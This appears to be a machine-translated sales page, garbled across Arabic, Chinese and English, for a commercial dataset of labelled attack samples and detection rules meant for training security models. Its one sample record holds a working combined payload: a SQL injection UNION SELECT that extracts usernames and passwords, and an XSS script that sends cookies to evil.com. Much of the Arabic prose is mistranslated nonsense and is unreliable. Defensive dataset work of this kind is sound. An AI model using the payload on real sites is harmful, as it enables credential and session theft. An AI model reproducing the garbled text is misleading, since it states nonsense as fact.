لمحة عامة عن البيانات
التعريف:مجموعة بيانات قاعدة بيانات تحديد التهديدات الشاملةمقدم منشركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودةThe large multi-type threat detection data set built by the security laboratory.قواعد XML + حركة المرور + HTTP Reconstructed Text + 攻击النوع标签 + الحقيقة الأرضيةويوفر هيكل الجمعيات المؤلف من خمسة مستويات، الذي يغطي الهجوم على الشبكة (SQLi/XSS/RCE/LFI/SRF)، والهجوم السيبراني (DDOS/Scans/C2)، والهجوم على الحاسوب الرئيسي (التعبئة/الاستمرار)، والهجوم الأمني السحابي، والهجوم على نظام المعلومات الإدارية المتكامل، والاختراق اليومي/يومي، باستخدام ست فئات تهديد واسعة النطاق، خريطة إطارية لنظام أطلس (تغطي 14 تكتيكا نموذجية) ومصممة للتدريب الشامل.
| اسم البيانات | مجموعة بيانات قاعدة بيانات تحديد التهديدات الشاملة |
| مجموع حجم البيانات | 2,000~50,000条 |
| نوع البيانات | خمسة:قواعد XML + حركة المرور + HTTP Reconstructed Text + 攻击النوع标签 + الحقيقة الأرضية |
| المصدر | Longhui Security Laboratory + Multi-source Threat Information (OTX/AlienVault/MISP) + Laundry Platform |
| نوع الترخيص | التراخيص التجارية مرفق وثائق التفويض الكاملة |
| دورة التسليم | 4-6周 |
| 威胁类别 | هجمات على الشبكة (تحميل SQLi/XSS/LFI/SSRF/document/XXE)، والهجمات الإلكترونية (DDDOS/port scan/C2) ونفقات الحاسوب الرئيسي (ترفع/تستمر/تجريب/تغطية)، والهجمات الأمنية السحابية (S3-pass/MDSv1، وأجهزة استخدام/IAM)، والهجمات التي شنها التحالف الدولي لمنع التمييز ضد المرأة (الاعتداء على حقن/التوقيت |
| ATTCK Mapping | خريطة تكتيكية كاملة: إعادة تشكيل، تنمية الموارد، الوصول الداخلي، التنفيذ، السياسات، الوصول الخاص، رؤية الدفاع، الوصول إلى الكريستال، الاكتشاف، الحركة اللاحق، الخلاص، الاختراق، الاصطدام، الأثر |
| الناتج | JSONL / CSV / Excel / PCAP |
| اللغة | اللغة الصينية والإنكليزية |
مجالات البيانات الأساسية
وتتضمن كل بيانات ست فئات من فئات تحديد القواعد، وقواعد الكشف عن الألغام غير المنفجرة، وحمولة الهجوم، واستعادة برنامج نقل الأسلحة البشرية للنص، وحركة المرور في برنامج عمل بربادوس، وإجابات موحدة تغطي الحلقة المغلقة الكاملة من تعريف القواعد إلى تقييم المصادقة.
| الفئة الميدانية | العدة الميدانية | المجالات النموذجية |
|---|---|---|
| تعريف القاعدة | 4 | القاعدة (القاعدة _KEEP_core_ID)، القاعدة - الاسم (اسم القاعدة)، التهديد - الفئة (الفئة العمرية من التهديد)، الشدة (المستوى الخطير: CC/High/Medium/Low) |
| XML Detection Rules | 3 | القاعدة xml (قاعدة الشائعات/Suricata/ModSecurityXML)، المادة /التوقيع (توقيع القاعدة)، القاعدة /منابر قابلة للتطبيق: NIDS/WAF/HIDS) |
| حمولة الهجوم | 4 | حمولة (خطة تحميل) تهديد - الفئة (علامة تصنيف المخاطر)، التهديد - المستوى (1-5)، الرمز - نوع (طريقة الترميز) |
| HTTP Reconstructed Text | 3 | http_request (full HTTP request), http_response (full HTTP response), protocol_info (agreement information: HTTP/1.1/HTTTP2/gRPC) |
| حركة المرور | 4 | كبف - كبف (كبل (كومب) وكمية (حجم) وحزمة - فرز (عدد مجموعات البيانات) وتدفق - ضمان) |
| الحقيقة الأرضية | 5 | (سواء كان الهجوم أو لم يهاجم: صحيح/مرتب)، الهجوم - نوع (نوع محدد من الهجوم)، مشروع قانون - chain_face (القتل/النشر/المعلومات/C2/Actions)، التقنيات - (قائمة الصلات بالهوية التقنية لشبكة " تاتشيك " )، الأثر - أساسي (التقدير 1-10) |
| وصلات المعلومات المتعلقة بالتهديد | 3 | cve_ref (associated CVE number),mitre_group (associated with APT), campaign (associated attack/war name) |
عرض عينات البيانات
وفيما يلي عينة منظمة من نوعها " يوبون " بعد التحسس، تبين الشكل النموذجي لبيانات الكشف عن حقن السائل SQL.
{
"entry_id": "THREAT-2024-012834",
"rule_id": "THREAT-WEB-0452",
"rule_name": "Combined SQLi + XSS Attack via Search Endpoint",
"threat_category": "Web Attack (SQLi + XSS)",
"severity": "Critical",
"rule_xml": "<rule id=\"1000001\" phase=\"2\">\n <operator>multiDetect</operator>\n <action>block</action>\n <pattern_sqli>union\\s+(?:all\\s+)?select</pattern_sqli>\n <pattern_xss><script.*?></pattern_xss>\n <target>ARGS|REQUEST_BODY</target>\n</rule>",
"payload": "1' UNION SELECT NULL,username,password FROM users-- <script>new Image().src='http://evil.com/steal?c='+document.cookie</script>",
"threat_category": "Web Attack",
"threat_level": 5,
"encoding_type": "Mixed (SQLi: URL-encoded, XSS: plaintext)",
"http_request": "GET /search.php?q=1'%20UNION%20SELECT...<script>... HTTP/1.1\r\nHost: target-web.com\r\nCookie: PHPSESSID=abc123\r\n\r\n",
"http_response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>...admin:$2a$10$hash...<script>new Image().src=...</script>...</html>",
"pcap_file": "threat_web_combined_sqli_xss.pcap",
"pcap_size": "24532",
"packet_count": 78,
"technique_ids": ["T1190","T1059.004","T1189"],
"kill_chain_phase": "Exploitation",
"impact_score": 9.5,
"mitre_group": "APT41",
"cve_ref": "N/A",
"answer": {
"is_attack": true,
"attack_type": "Combined SQLi + Reflected XSS",
"kill_chain_phase": "Exploitation",
"impact_score": 9.5
}
}السيناريوهات التطبيقية
النموذج الأمني المتكامل قبل التدريب
ويشكل 000 50 من البيانات المتعددة الأنواع عن التهديدات التي تبلغ مساحتها خمسة ميغاهات تغطي الفئات الرئيسية الست للشبكة/الشبكة/الوحدة/الوحدة/الوحدة/اليوم، قاعدة اللغة الكاملة للتدريب السابق على الإدارة الأمنية للأراضي.
نموذج قاعدة الكشف المتعددة المخاطر
The introduction of SQL into the APT attack, the training of a unified multi-threat detection base model for cross-category threat data, and the realization of the One Model for All Threats common security AI structure.
مركز العمليات الأمنية
تم وضع خريطة كاملة لسلسلة " تون " ، وخطة " سي. سي. سي " ، واتسمت بتدريب محللي شركة SOC AI " تلقائياً: تنبيه الشرطة إلى وضع تصنيف للتهديدات وإعادة الاستجابة لتوصيات سلسلة الهجوم آلياً.
الاستجابة الآلية للنشرة
(ب) بيانات التهديد المتعدد الأبعاد عبر الشبكة/الشبكة/الشبكة/الرئيس/الوحدة، وتدريب محركات المبادرة على إجراء تحليل للترابط بين مختلف المواقع الرئيسية، وخفض مسارات الهجوم، ووضع برامج آلية للاستجابة.
ثريات هنت إي
واستنادا إلى مسح تكنولوجيا MTRA TATTCK وربطت منظمة APT البيانات والتدريب على الصيد النشط من أجل التهديدات المحتملة وتحديد أنماط الهجوم الخفية.
التوعية بالحالة الأمنية
Multiple threat data + threat level + impact rating, training Security Situational Awareness AI to assess the overall security posture of the enterprise in real time, generating dynamic risk ratings and predictive alerts.
المشاكل المشتركة
الحاجة إلى برامج واسعة النطاق متعددة النماذج لكشف التهديدات؟
شركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودة وتكرس منبر نظام البيانات - آسيا والمحيط الهادئ لتوفير أصول عالية الجودة وممتثلة للبيانات الأمنية على الشبكة لشركات التحقيق ومؤسسات البحوث، وتدعم الجمعات المرنة من النموذج الفرعي لحقن SQL، حسب قاعدة البيانات، وشكل قواعد الكشف.
عينة من البيانات قبل استعراض البرنامج المتكامل للتهديدات